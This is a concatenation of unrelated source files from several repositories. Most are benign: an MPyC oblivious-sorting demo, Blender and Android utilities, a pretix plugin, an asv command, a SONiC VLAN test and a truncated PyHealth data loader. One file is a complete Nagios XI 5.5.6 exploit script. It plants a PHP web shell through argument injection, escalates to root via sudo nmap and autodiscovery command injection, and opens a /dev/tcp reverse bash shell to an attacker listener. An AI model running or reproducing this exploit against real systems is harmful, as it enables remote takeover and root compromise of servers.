<reponame>bahmanahmadi/mpyc """Demo oblivious sorting in MPyC, with full secrecy. Randomly generated secret-shared lists of numbers (integers or fixed-point numbers) are sorted using MPyC's built-in functions mcp.sorted() and seclist.sort(), which are the secure counterparts of Python's built-in function sorted() and list.sort(), respectively. """ import sys from mpyc.runtime import mpc from mpyc.seclists import seclist async def main(): if sys.argv[1:]: n = int(sys.argv[1]) else: n = 5 print('Setting input to default =', n) s = [(-1)**i * (i + n//2)**2 for i in range(n)] secnum = mpc.SecInt() print('Using secure integers:', secnum) x = list(map(secnum, s)) async with mpc: mpc.random.shuffle(secnum, x) # secret in-place random shuffle print('Randomly shuffled input:', await mpc.output(x)) x = mpc.sorted(x, key=lambda a: a**2) # sort on absolute value print('Sorted by absolute value:', await mpc.output(x)) secnum = mpc.SecFxp() print('Using secure fixed-point numbers:', secnum) x = list(map(secnum, s)) async with mpc: mpc.random.shuffle(secnum, x) # secret in-place random shuffle print('Randomly shuffled input:', await mpc.output(x)) x = seclist(x) x.sort(reverse=True) # in-place sort in descending order print('Sorted by descending value:', await mpc.output(list(x))) if __name__ == '__main__': mpc.run(main())
examples/host_external_norestart.py
virtualgod/python-sc2
621
12748051
import argparse import sys import asyncio import sc2 from sc2 import Race from sc2.player import Bot from zerg.zerg_rush import ZergRushBot def main(): portconfig = sc2.portconfig.Portconfig() print(portconfig.as_json) player_config = [ Bot(Race.Zerg, ZergRushBot()), Bot(Race.Zerg, None) ] for g in sc2.main._host_game_iter( sc2.maps.get("Abyssal Reef LE"), player_config, realtime=False, portconfig=portconfig ): print(g) if __name__ == "__main__": main()
bpycv/physic_utils.py
TheShadow29/bpycv
248
12748067
<filename>bpycv/physic_utils.py #!/usr/bin/env python3 import bpy import mathutils from .object_utils import activate_obj SET_ORIGIN_HOOK_NAME = "set_back_origin" OLD_V0_KEY = "old_object.data.vertices[0].co" def set_origin_and_record_old_v0(obj, type="ORIGIN_CENTER_OF_VOLUME", center="MEDIAN"): obj[OLD_V0_KEY] = obj.data.vertices[0].co.copy() with activate_obj(obj): bpy.ops.object.origin_set(type=type, center=center) def set_origin_by_vector(obj, new_origin_vector): return set_origin_by_point( obj, obj.matrix_world.to_translation() + new_origin_vector ) def set_origin_by_point(obj, point): """ Not work when bpy.context.scene.frame_curren != 1 """ cursor_mat = bpy.context.scene.cursor.matrix.copy() bpy.context.scene.cursor.rotation_euler = 0, 0, 0 bpy.context.scene.cursor.location = point with activate_obj(obj): bpy.ops.object.origin_set(type="ORIGIN_CURSOR", center="MEDIAN") bpy.context.scene.cursor.matrix = cursor_mat return obj if __name__ == "__main__": pass
android_env/components/adb_log_stream.py
yjaeseok/android_env
768
12748096
# coding=utf-8 # Copyright 2021 DeepMind Technologies Limited. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Class for a stream of logs output by a locally running emulator.""" import subprocess from typing import List from android_env.components import log_stream _LOGCAT_COMMAND = ['logcat', '-v', 'epoch'] class AdbLogStream(log_stream.LogStream): """Manages adb logcat process for a locally running emulator.""" def __init__(self, adb_command_prefix: List[str], *args, **kwargs): super().__init__(*args, **kwargs) self._adb_command_prefix = adb_command_prefix def _get_stream_output(self): cmd = self._adb_command_prefix + _LOGCAT_COMMAND + self._filters self._adb_subprocess = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, universal_newlines=True) return self._adb_subprocess.stdout def stop_stream(self): self._adb_subprocess.kill()
src/pretix/plugins/statistics/signals.py
fabm3n/pretix
1,248
12748109
<gh_stars>1000+ # # This file is part of pretix (Community Edition). # # Copyright (C) 2014-2020 <NAME> and contributors # Copyright (C) 2020-2021 rami.io GmbH and contributors # # This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General # Public License as published by the Free Software Foundation in version 3 of the License. # # ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are # applicable granting you additional permissions and placing additional restrictions on your usage of this software. # Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive # this file, see <https://pretix.eu/about/en/license>. # # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied # warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more # details. # # You should have received a copy of the GNU Affero General Public License along with this program. If not, see # <https://www.gnu.org/licenses/>. # from django.dispatch import receiver from django.urls import resolve, reverse from django.utils.translation import gettext_lazy as _ from pretix.base.signals import order_paid, order_placed from pretix.control.signals import nav_event @receiver(nav_event, dispatch_uid="statistics_nav") def control_nav_import(sender, request=None, **kwargs): url = resolve(request.path_info) if not request.user.has_event_permission(request.organizer, request.event, 'can_view_orders', request=request): return [] return [ { 'label': _('Statistics'), 'url': reverse('plugins:statistics:index', kwargs={ 'event': request.event.slug, 'organizer': request.event.organizer.slug, }), 'parent': reverse('control:event.orders', kwargs={ 'event': request.event.slug, 'organizer': request.event.organizer.slug, }), 'active': (url.namespace == 'plugins:statistics'), 'icon': 'bar-chart', } ] def clear_cache(sender, *args, **kwargs): cache = sender.cache cache.delete('statistics_obd_data') cache.delete('statistics_obp_data') cache.delete('statistics_rev_data') order_placed.connect(clear_cache) order_paid.connect(clear_cache)
asv/commands/rm.py
jaimergp/asv
476
12748115
# -*- coding: utf-8 -*- # Licensed under a 3-clause BSD style license - see LICENSE.rst from __future__ import (absolute_import, division, print_function, unicode_literals) import six from fnmatch import fnmatchcase import sys from . import Command from .. import console from ..console import log from ..results import iter_results from . import util class Rm(Command): @classmethod def setup_arguments(cls, subparsers): parser = subparsers.add_parser( "rm", help="Remove results from the database", description=""" Removes entries from the results database. """) parser.add_argument( 'patterns', nargs='+', help="""Pattern(s) to match, each of the form X=Y. X may be one of "benchmark", "commit_hash", "python" or any of the machine or environment params. Y is a case-sensitive glob pattern.""") parser.add_argument( "-y", action="store_true", help="""Don't prompt for confirmation.""") parser.set_defaults(func=cls.run_from_args) return parser @classmethod def run_from_conf_args(cls, conf, args): return cls.run(conf, args.patterns, args.y) @classmethod def run(cls, conf, patterns, y=True): global_patterns = {} single_benchmark = None files_to_remove = set() count = 0 for pattern in patterns: parts = pattern.split('=', 1) if len(parts) != 2: raise util.UserError("Invalid pattern '{0}'".format(pattern)) if parts[0] == 'benchmark': if single_benchmark is not None: raise util.UserError("'benchmark' appears more than once") single_benchmark = parts[1] else: if parts[0] in global_patterns: raise util.UserError( "'{0}' appears more than once".format(parts[0])) global_patterns[parts[0]] = parts[1] for result in iter_results(conf.results_dir): found = True for key, val in six.iteritems(global_patterns): if key == 'commit_hash': if not util.hash_equal(result.commit_hash, val): found = False break elif key == 'python': if not fnmatchcase(result.env.python, val): found = False break else: if not fnmatchcase(result.params.get(key), val): found = False break if not found: continue if single_benchmark is not None: found = False for benchmark in list(result.get_all_result_keys()): if fnmatchcase(benchmark, single_benchmark): count += 1 files_to_remove.add(result) result.remove_result(benchmark) else: files_to_remove.add(result) if single_benchmark is not None: log.info("Removing {0} benchmarks in {1} files".format( count, len(files_to_remove))) else: log.info("Removing {0} files".format(len(files_to_remove))) if not y: do = console.get_answer_default("Perform operations", "n") if len(do) and do.lower()[0] != 'y': sys.exit(0) if single_benchmark is not None: for result in files_to_remove: result.save(conf.results_dir) else: for result in files_to_remove: result.rm(conf.results_dir)
ansible/roles/test/files/ptftests/vlan_test.py
shubav/sonic-mgmt
132
12748133
<gh_stars>100-1000 import ast import json import logging import subprocess from collections import defaultdict from ipaddress import ip_address, ip_network import ptf import ptf.packet as scapy import ptf.dataplane as dataplane from ptf import config from ptf.base_tests import BaseTest from ptf.testutils import * from ptf.mask import Mask class VlanTest(BaseTest): def __init__(self): BaseTest.__init__(self) self.test_params = test_params_get() #-------------------------------------------------------------------------- def log(self, message): logging.info(message) #-------------------------------------------------------------------------- def shell(self, cmds): sp = subprocess.Popen(cmds, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = sp.communicate() rc = sp.returncode return stdout, stderr, rc #-------------------------------------------------------------------------- def setUp(self): self.vlan_ports_list = ast.literal_eval(self.test_params["vlan_ports_list"]) self.vlan_intf_list = ast.literal_eval(self.test_params["vlan_intf_list"]) self.router_mac = self.test_params["router_mac"] for vlan_port in self.vlan_ports_list: vlan_port["pvid"] = int(vlan_port["pvid"]) vlan_port["port_index"] = int(vlan_port["port_index"]) self.dataplane = ptf.dataplane_instance self.test_params = test_params_get() self.log("Create VLAN intf") for vlan_port in self.vlan_ports_list: for permit_vlanid in vlan_port["permit_vlanid"].keys(): if int(permit_vlanid) != vlan_port["pvid"]: self.shell(["ip", "link", "add", "link", "eth%d"%vlan_port["port_index"], "name", "eth%d.%s"%(vlan_port["port_index"], permit_vlanid), "type", "vlan", "id", str(permit_vlanid)]) self.shell(["ip", "link", "set", "eth%d.%s"%(vlan_port["port_index"], permit_vlanid), "up"]) self.setUpArpResponder() self.log("Start arp_responder") self.shell(["supervisorctl", "start", "arp_responder"]) logging.info("VLAN test starting ...") pass #-------------------------------------------------------------------------- def setUpArpResponder(self): vlan_ports_list = self.vlan_ports_list d = defaultdict(list) for vlan_port in vlan_ports_list: for permit_vlanid in vlan_port["permit_vlanid"].keys(): if int(permit_vlanid) == vlan_port["pvid"]: iface = "eth%d" % vlan_port["port_index"] else: iface = "eth%d.%s" % (vlan_port["port_index"], permit_vlanid) d[iface].append(vlan_port["permit_vlanid"][str(permit_vlanid)]["peer_ip"]) with open('/tmp/from_t1.json', 'w') as file: json.dump(d, file) #-------------------------------------------------------------------------- def tearDown(self): logging.info("VLAN test ending ...") self.log("Stop arp_responder") self.shell(["supervisorctl", "stop", "arp_responder"]) self.log("Delete VLAN intf") for vlan_port in self.vlan_ports_list: for permit_vlanid in vlan_port["permit_vlanid"].keys(): if int(permit_vlanid) != vlan_port["pvid"]: self.shell(["ip", "link", "delete", "eth%d.%d"%(vlan_port["port_index"], int(permit_vlanid))]) pass #-------------------------------------------------------------------------- def build_icmp_packet(self, vlan_id, src_mac="00:22:00:00:00:02", dst_mac="ff:ff:ff:ff:ff:ff", src_ip="192.168.0.1", dst_ip="192.168.0.2", ttl=64): pkt = simple_icmp_packet(pktlen=100 if vlan_id == 0 else 104, eth_dst=dst_mac, eth_src=src_mac, dl_vlan_enable=False if vlan_id == 0 else True, vlan_vid=vlan_id, vlan_pcp=0, ip_src=src_ip, ip_dst=dst_ip, ip_ttl=ttl) return pkt #-------------------------------------------------------------------------- def verify_icmp_packets(self, vlan_port, vlan_id): untagged_dst_ports = [] tagged_dst_ports = [] untagged_pkts = [] tagged_pkts = [] untagged_pkt = self.build_icmp_packet(0) tagged_pkt = self.build_icmp_packet(vlan_id) for port in self.vlan_ports_list: if vlan_port["port_index"] == port["port_index"]: # Skip src port continue if port["pvid"] == vlan_id: untagged_dst_ports.append(port["port_index"]) untagged_pkts.append(untagged_pkt) elif vlan_id in map(int, port["permit_vlanid"].keys()): tagged_dst_ports.append(port["port_index"]) tagged_pkts.append(tagged_pkt) self.log("Verify untagged packets from ports " + str(untagged_dst_ports) + " tagged packets from ports " + str(tagged_dst_ports)) verify_each_packet_on_each_port(self, untagged_pkts+tagged_pkts, untagged_dst_ports+tagged_dst_ports) #-------------------------------------------------------------------------- def verify_icmp_packets_from_specified_port(self, port_id, vlan_id, src_mac, dst_mac, src_ip, dst_ip, ttl): self.log("Verify packet from port " + str(port_id)) pkt = self.build_icmp_packet(vlan_id, src_mac, dst_mac, src_ip, dst_ip, ttl) verify_packet(self, pkt, port_id) #-------------------------------------------------------------------------- def runTest(self): vlan_ports_list = self.vlan_ports_list vlan_intf_list = self.vlan_intf_list # Test case #1 self.log("Test case #1 starting ...") # Send untagged packets from each port. # Verify packets egress without tag from ports whose PVID same with ingress port # Verify packets egress with tag from ports who include VLAN ID but PVID different from ingress port. for vlan_port in vlan_ports_list: pkt = self.build_icmp_packet(0) self.log("Send untagged packet from {} ...".format(str(vlan_port["port_index"]))) self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%")) send(self, vlan_port["port_index"], pkt) self.verify_icmp_packets(vlan_port, vlan_port["pvid"]) # Test case #2 self.log("Test case #2 starting ...") # Send tagged packets from each port. # Verify packets egress without tag from ports whose PVID same with ingress port # Verify packets egress with tag from ports who include VLAN ID but PVID different from ingress port. for vlan_port in vlan_ports_list: for permit_vlanid in map(int, vlan_port["permit_vlanid"].keys()): pkt = self.build_icmp_packet(permit_vlanid) self.log("Send tagged({}) packet from {} ...".format(permit_vlanid, str(vlan_port["port_index"]))) self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%")) send(self, vlan_port["port_index"], pkt) self.verify_icmp_packets(vlan_port, permit_vlanid) # Test case #3 # Send packets with invalid VLAN ID # Verify no port can receive these pacekts self.log("Test case #3 starting ...") invalid_tagged_pkt = self.build_icmp_packet(4095) masked_invalid_tagged_pkt = Mask(invalid_tagged_pkt) masked_invalid_tagged_pkt.set_do_not_care_scapy(scapy.Dot1Q, "vlan") for vlan_port in vlan_ports_list: src_port = vlan_port["port_index"] dst_ports = [port["port_index"] for port in vlan_ports_list if port != vlan_port ] self.log("Send invalid tagged packet " + " from " + str(src_port) + "...") self.log(invalid_tagged_pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%")) send(self, src_port, invalid_tagged_pkt) self.log("Check on " + str(dst_ports) + "...") verify_no_packet_any(self, masked_invalid_tagged_pkt, dst_ports) # Test case #4 # Send packets over VLAN interfaces. # Verify packets can be receive on the egress port. self.log("Test case #4 starting ...") target_list = [] for vlan_port in vlan_ports_list: for vlan_id in vlan_port["permit_vlanid"].keys(): item = {"vlan_id": int(vlan_id), "port_index": vlan_port["port_index"], "peer_ip": vlan_port["permit_vlanid"][vlan_id]["peer_ip"], "remote_ip": vlan_port["permit_vlanid"][vlan_id]["remote_ip"], "pvid": vlan_port["pvid"]} target_list.append(item) for vlan_port in vlan_ports_list: src_port = vlan_port["port_index"] src_mac = self.dataplane.get_mac(0, src_port) dst_mac = self.router_mac for vlan_id in map(int, vlan_port["permit_vlanid"].keys()): # Test for for directly-connected routing src_ip = vlan_port["permit_vlanid"][str(vlan_id)]["peer_ip"] for target in target_list: if vlan_id == target["vlan_id"]: # Skip same VLAN forwarding continue pkt = self.build_icmp_packet(vlan_id if vlan_id != vlan_port["pvid"] else 0, src_mac, dst_mac, src_ip, target["peer_ip"]) send(self, src_port, pkt) self.log("Send {} packet from {} ...".format("untagged" if vlan_id == 0 else "tagged(%d)"%vlan_id, src_port)) self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%")) self.verify_icmp_packets_from_specified_port(target["port_index"], target["vlan_id"] if target["vlan_id"] != target["pvid"] else 0, dst_mac, self.dataplane.get_mac(0, target["port_index"]), src_ip, target["peer_ip"], 63) # Test for for indirectly-connected routing src_ip = vlan_port["permit_vlanid"][str(vlan_id)]["remote_ip"] for target in target_list: if vlan_id == target["vlan_id"]: # Skip same VLAN forwarding continue pkt = self.build_icmp_packet(vlan_id if vlan_id != vlan_port["pvid"] else 0, src_mac, dst_mac, src_ip, target["remote_ip"]) self.log("Send {} packet from {} ...".format("untagged" if vlan_id == 0 else "tagged(%d)"%vlan_id, src_port)) self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%")) send(self, src_port, pkt) self.verify_icmp_packets_from_specified_port(target["port_index"], target["vlan_id"] if target["vlan_id"] != target["pvid"] else 0, dst_mac, self.dataplane.get_mac(0, target["port_index"]), src_ip, target["remote_ip"], 63) # Test case #5 # Send ICMP packets to VLAN interfaces. # Verify ICMP reply packets can be received from ingress port. self.log("Test case #5 starting ...") for vlan_port in vlan_ports_list: src_port = vlan_port["port_index"] src_mac = self.dataplane.get_mac(0, src_port) dst_mac = self.router_mac for vlan_id in map(int, vlan_port["permit_vlanid"].keys()): src_ip = vlan_port["permit_vlanid"][str(vlan_id)]["peer_ip"] for vlan_intf in vlan_intf_list: if int(vlan_intf["vlan_id"]) != vlan_id: continue dst_ip = vlan_intf["ip"].split("/")[0] pkt = self.build_icmp_packet(vlan_id if vlan_id != vlan_port["pvid"] else 0, src_mac, dst_mac, src_ip, dst_ip) self.log("Send {} packet from {} ...".format("untagged" if vlan_id == 0 else "tagged(%d)"%vlan_id, src_port)) self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%")) send(self, src_port, pkt) exp_pkt = simple_icmp_packet(eth_src=self.router_mac, eth_dst=src_mac, dl_vlan_enable=True if vlan_id != vlan_port["pvid"] else False, vlan_vid=vlan_id if vlan_id != vlan_port["pvid"] else 0, vlan_pcp=0, ip_dst=src_ip, ip_src=dst_ip, icmp_type=0, icmp_code=0) masked_exp_pkt = Mask(exp_pkt) masked_exp_pkt.set_do_not_care_scapy(scapy.IP, "id") verify_packets(self, masked_exp_pkt, list(str(src_port))) self.log("Verify packet from port " + str(src_port)) #--------------------------------------------------------------------------
nagios/nagiosxi_556_rce_lpe.py
iamarkaj/poc
1,007
12748135
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler import SocketServer, threading, ssl import requests, urllib import sys, os, argparse from OpenSSL import crypto from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # https://www.tenable.com/security/research/tra-2018-37 # # This code exploits both CVE-2018-15708 and CVE-2018-15710 to pop root a shell. # It has been tested against Nagios XI 2012r1.0, 5r1.0, and 5.5.6. TIMEOUT = 5 # sec def err_and_exit(msg): print '\n\nERROR: ' + msg + '\n\n' sys.exit(1) # handle sending a get request def http_get_quiet(url): try: r = requests.get(url, timeout=TIMEOUT, verify=False) except requests.exceptions.ReadTimeout: err_and_exit("Request to '" + url + "' timed out.") else: return r # 200? def url_ok(url): r = http_get_quiet(url) return (r.status_code == 200) # run a shell command using the PHP file we uploaded def send_shell_cmd(path, cmd): querystr = { 'cmd' : cmd } # e.g. http://blah/exec.php?cmd=whoami url = path + '?' + urllib.urlencode(querystr) return http_get_quiet(url) # delete some files locally and on the Nagios XI instance def clean_up(remote, paths, exec_path=None): if remote: for path in paths: send_shell_cmd(exec_path, 'rm ' + path) print 'Removing remote file ' + path else: for path in paths: os.remove(path) print 'Removing local file ' + path # Thanks http://django-notes.blogspot.com/2012/02/generating-self-signed-ssl-certificate.html def generate_self_signed_cert(cert_dir, cert_file, key_file): """Generate a SSL certificate. If the cert_path and the key_path are present they will be overwritten. """ if not os.path.exists(cert_dir): os.makedirs(cert_dir) cert_path = os.path.join(cert_dir, cert_file) key_path = os.path.join(cert_dir, key_file) if os.path.exists(cert_path): os.unlink(cert_path) if os.path.exists(key_path): os.unlink(key_path) # create a key pair key = crypto.PKey() key.generate_key(crypto.TYPE_RSA, 1024) # create a self-signed cert cert = crypto.X509() cert.get_subject().C = 'US' cert.get_subject().ST = 'Lorem' cert.get_subject().L = 'Ipsum' cert.get_subject().O = 'Lorem' cert.get_subject().OU = 'Ipsum' cert.get_subject().CN = 'Unknown' cert.set_serial_number(1000) cert.gmtime_adj_notBefore(0) cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60) cert.set_issuer(cert.get_subject()) cert.set_pubkey(key) cert.sign(key, 'sha1') with open(cert_path, 'wt') as fd: fd.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert)) with open(key_path, 'wt') as fd: fd.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key)) return cert_path, key_path # HTTP request handler class MyHTTPD(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) msg = '<?php system($_GET[\'cmd\']); ?>' # this will be written to the PHP file self.end_headers() self.wfile.write(str.encode(msg)) # Make the http listener operate on its own thread class ThreadedWebHandler(object): def __init__(self, host, port, keyfile, certfile): self.server = SocketServer.TCPServer((host, port), MyHTTPD) self.server.socket = ssl.wrap_socket( self.server.socket, keyfile=keyfile, certfile=certfile, server_side=True ) self.server_thread = threading.Thread(target=self.server.serve_forever) self.server_thread.daemon = True def start(self): self.server_thread.start() def stop(self): self.server.shutdown() self.server.server_close() ##### MAIN ##### desc = 'Nagios XI 5.5.6 MagpieRSS Remote Code Execution and Privilege Escalation' arg_parser = argparse.ArgumentParser(description=desc) arg_parser.add_argument('-t', required=True, help='Nagios XI IP Address (Required)') arg_parser.add_argument('-ip', required=True, help='HTTP listener IP') arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)') arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP') arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)') args = arg_parser.parse_args() # Nagios XI target settings target = { 'ip' : args.t } # listener settings listener = { 'ip' : args.ip, 'port' : args.port, 'ncip' : args.ncip, 'ncport': args.ncport } # generate self-signed cert cert_file = 'cert.crt' key_file = 'key.key' generate_self_signed_cert('./', cert_file, key_file) # start threaded listener # thanks http://brahmlower.io/threaded-http-server.html server = ThreadedWebHandler(listener['ip'], listener['port'], key_file, cert_file) server.start() print "\nListening on " + listener['ip'] + ":" + str(listener['port']) # path to Nagios XI app base_url = 'https://' + target['ip'] # ensure magpie_debug.php exists magpie_url = base_url + '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php' if not url_ok(magpie_url): err_and_exit('magpie_debug.php not found.') print '\nFound magpie_debug.php.\n' exec_path = None # path to exec.php in URL cleanup_paths = [] # local path on Nagios XI filesystem to clean up # ( local fs path : url path ) paths = [ ( '/usr/local/nagvis/share/', '/nagvis' ), ( '/var/www/html/nagiosql/', '/nagiosql' ) ] # inject argument to create exec.php # try multiple directories if necessary. dir will be different based on nagios xi version filename = 'exec.php' for path in paths: local_path = path[0] + filename # on fs url = 'https://' + listener['ip'] + ':' + str(listener['port']) + '/%20-o%20' + local_path # e.g. https://192.168.1.191:8080/%20-o%20/var/www/html/nagiosql/exec.php url = magpie_url + '?url=' + url print 'magpie url = ' + url r = http_get_quiet(url) # ensure php file was created exec_url = base_url + path[1] + '/' + filename # e.g. https://192.168.1.192/nagiosql/exec.php if url_ok(exec_url): exec_path = exec_url cleanup_paths.append(local_path) break # otherwise, try the next path if exec_path is None: err_and_exit('Couldn\'t create PHP file.') print '\n' + filename + ' written. Visit ' + exec_url + '\n' # run a few commands to display status to user print 'Gathering some basic info...' cmds = [ ('whoami', 'Current User'), ("cat /usr/local/nagiosxi/var/xiversion | grep full | cut -d '=' -f 2", 'Nagios XI Version') ] for cmd in cmds: r = send_shell_cmd(exec_url, cmd[0]) sys.stdout.write('\t' + cmd[1] + ' => ' + r.text) # candidates for privilege escalation # depends on Nagios XI version rev_bash_shell = '/bin/bash -i >& /dev/tcp/' + listener['ncip'] + '/' + str(listener['ncport']) + ' 0>&1' # tuple contains (shell command, cleanup path) priv_esc_list = [ ("echo 'os.execute(\"" + rev_bash_shell + "\")' > /var/tmp/shell.nse && sudo nmap --script /var/tmp/shell.nse", '/var/tmp/shell.nse'), ("sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/1`" + rev_bash_shell + "`'", None) ] # escalate privileges and launch the connect-back shell timed_out = False for priv_esc in priv_esc_list: try: querystr = { 'cmd' : priv_esc[0] } url = exec_path + '?' + urllib.urlencode(querystr) r = requests.get(url, timeout=TIMEOUT, verify=False) print '\nTrying to escalate privs with url: ' + url except requests.exceptions.ReadTimeout: timed_out = True if priv_esc[1] is not None: cleanup_paths.append(priv_esc[1]) break if timed_out: print 'Check for a shell!!\n' else: print 'Not so sure it worked...\n' server.stop() # clean up files we created clean_up(True, cleanup_paths, exec_path) # remote files clean_up(False, [cert_file, key_file])
pyhealth/data/expdata_generator.py
Abhinav43/PyHealth
485
12748155
<filename>pyhealth/data/expdata_generator.py # -*- coding: utf-8 -*- # Author: <NAME> <<EMAIL>> # License: BSD 2 clause import os import csv import pickle import random import numpy as np import pandas as pd import tqdm from tqdm._tqdm import trange import time try: from ..utils.check import * except: from pyhealth.utils.check import * class imagedata: def __init__(self, expdata_id, root_dir='.'): """ experiment data generat class for cms datasets Parameters ---------- exp_id : str, optional (default='init.test') name of current experiment """ self.expdata_id = expdata_id check_expdata_dir(expdata_id = expdata_id) self.root_dir = root_dir self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id) print( 'Current ExpData_ID: {0} --- Target for CMS'.format( self.expdata_id)) def get_exp_data(self, sel_task='diagnose', shuffle=True, split_ratio=[0.64, 0.16, 0.2], data_root = '', n_limit = -1): """ Parameters ---------- task : str, optional (default='phenotyping') name of current healthcare task shuffle : bool, optional (default=True) determine whether shuffle data or not split_ratio : list, optional (default=[0.64,0.16,0.2]) used for split whole data into train/valid/test data_root : str, (default='') use data in data_root n_limit : int, optional (default = -1) used for sample N-data not for all data, if n_limit==-1, use all data """ self.sel_task = sel_task if data_root == '': raise Exception('fill in correct data_root') all_list = [] l_list = [] episode_dir = os.path.join(data_root, 'x_data') feat_n, label_n = 0, 0 label_seq = pd.read_csv(os.path.join(data_root, 'y_data', self.sel_task + '.csv')).values for row_id in trange(len(label_seq)): if n_limit>0 and row_id>n_limit: break time.sleep(0.01) row = label_seq[row_id, :] concrete_path = os.path.join(episode_dir, row[0]) if os.path.exists(concrete_path) is False: continue all_list.append([concrete_path] + row[1:].astype(float).tolist()) label_n = len(row[1:]) # shuffle the list if shuffle: random.shuffle(all_list) N = len(all_list) x_list = [] y_list = [] for item in all_list: x_list.append(item[0]) y_list.append(np.array(item[1:]).astype(float)) train_ratio = split_ratio[0] valid_ratio = split_ratio[1] training_x = x_list[: int(train_ratio * N)] validing_x = x_list[int(train_ratio * N): int( (train_ratio + valid_ratio) * N)] testing_x = x_list[int((train_ratio + valid_ratio) * N):] training_y = y_list[: int(train_ratio * N)] validing_y = y_list[int(train_ratio * N): int( (train_ratio + valid_ratio) * N)] testing_y = y_list[int((train_ratio + valid_ratio) * N):] if os.path.exists(self.expdata_dir) is False: os.makedirs(self.expdata_dir) pickle.dump(training_x, open( os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb')) pickle.dump(validing_x, open( os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb')) pickle.dump(testing_x, open( os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb')) print ('finished X generate') pickle.dump(training_y, open( os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb')) pickle.dump(validing_y, open( os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb')) pickle.dump(testing_y, open( os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb')) print ('finished Y generate') expdata_statistic = { 'task':self.sel_task, 'raio': split_ratio, 'label_n': label_n, 'len_train': len(training_x), 'len_valid': len(validing_x), 'len_test': len(testing_x) } pickle.dump(expdata_statistic, open( os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb')) self.train = {'x': training_x, 'y': training_y, 'label_n': label_n} self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n} self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n} print('generate finished') print('target Task:', expdata_statistic['task']) print('N of labels:', expdata_statistic['label_n']) print('N of TrainData:', expdata_statistic['len_train']) print('N of ValidData:', expdata_statistic['len_valid']) print('N of TestData:', expdata_statistic['len_test']) def load_exp_data(self): if os.path.exists(self.expdata_dir) is False: raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir)) training_x = pickle.load(open( os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb')) validing_x = pickle.load(open( os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb')) testing_x = pickle.load(open( os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb')) training_y = pickle.load(open( os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb')) validing_y = pickle.load(open( os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb')) testing_y = pickle.load(open( os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb')) expdata_statistic = pickle.load(open( os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb')) label_n = expdata_statistic['label_n'] self.train = {'x': training_x, 'y': training_y, 'label_n': label_n} self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n} self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n} print('load finished') print('target Task:', expdata_statistic['task']) print('N of labels:', expdata_statistic['label_n']) print('N of TrainData:', expdata_statistic['len_train']) print('N of ValidData:', expdata_statistic['len_valid']) print('N of TestData:', expdata_statistic['len_test']) def show_data(self, k=3): """ Parameters ---------- k : int, optional (default=3) fetch k sample data for show """ print('------------Train--------------') print('x_data', self.train['x'][:k]) print('y_data', self.train['y'][:k]) print('------------Valid--------------') print('x_data', self.valid['x'][:k]) print('y_data', self.valid['y'][:k]) print('------------Test--------------') print('x_data', self.test['x'][:k]) print('y_data', self.test['y'][:k]) class sequencedata: def __init__(self, expdata_id, root_dir='.'): """ experiment data generat class for cms datasets Parameters ---------- exp_id : str, optional (default='init.test') name of current experiment """ self.expdata_id = expdata_id check_expdata_dir(expdata_id = expdata_id) self.root_dir = root_dir self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id) print( 'Current ExpData_ID: {0} --- Target for MIMIC'.format( self.expdata_id)) def get_exp_data(self, sel_task='phenotyping', shuffle=True, split_ratio=[0.64, 0.16, 0.2], data_root = '', n_limit = -1): """ Parameters ---------- task : str, optional (default='phenotyping') name of current healthcare task shuffle : bool, optional (default=True) determine whether shuffle 